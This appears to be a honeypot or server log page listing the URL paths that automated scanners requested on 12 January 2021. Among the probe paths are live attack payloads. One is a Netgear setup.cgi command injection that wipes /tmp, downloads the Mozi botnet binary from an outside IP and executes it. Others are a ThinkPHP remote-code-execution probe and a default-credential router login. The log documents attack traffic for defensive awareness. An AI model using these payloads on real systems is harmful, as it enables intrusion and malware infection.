File Access Bruteforce Attempts for 2021-01-12

Share on:

Last Updated: 21:01 GMT+8

  • .env
  • 0bef
  • CVE-1999-1054/
  • CVE-2004-1524
  • CVE-2004-1943/
  • CVE-2007-0354/
  • GponForm/diag_FORM?images/
  • HNAP1
  • LICENSE00%0D%0A%0D%0A/cgi-bin/main.php?g2_view=zipcart.Download
  • ReportServer
  • ThinkCMFX/index.php
  • actuator/health
  • admin/index.php
  • assets/img/logo-high-resolution.png
  • backup/wp-content/plugins/apikey/apikey.php?test=hello
  • blog/wp-content/plugins/apikey/apikey.php?test=hello
  • boaform/admin/formLogin?username=user&psd=user
  • config/getuser?index=0
  • console/
  • evox/about
  • favicon.ico
  • index.php
  • index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP21
  • login
  • manager/html
  • manager/html/
  • menu.html?images/
  • new/wp-content/plugins/apikey/apikey.php?test=hello
  • nmaplowercheck1610402016
  • old/wp-content/plugins/apikey/apikey.php?test=hello
  • owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f
  • phpmyadmin/index.php
  • pmd/index.php
  • port30922/favicon.ico
  • public/index.php
  • setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://113.88.242.73:52393/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
  • solr/admin/info/system?wt=json
  • test/wp-content/plugins/apikey/apikey.php?test=hello
  • vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • webfig/
  • wordpress/wp-content/plugins/apikey/apikey.php?test=hello
  • wp-content/plugins/apikey/apikey.php
  • wp-content/plugins/apikey/apikey.php?test=hello
  • wp-content/plugins/apikey/cursed.php
  • wp-content/plugins/downloads-manager/img/unlock.gif
  • wp-content/plugins/wp-file-manager/readme.txt
  • wp-includes/js/jquery/jquery.js
  • wp-login.php
  • wp/wp-content/plugins/apikey/apikey.php?test=hello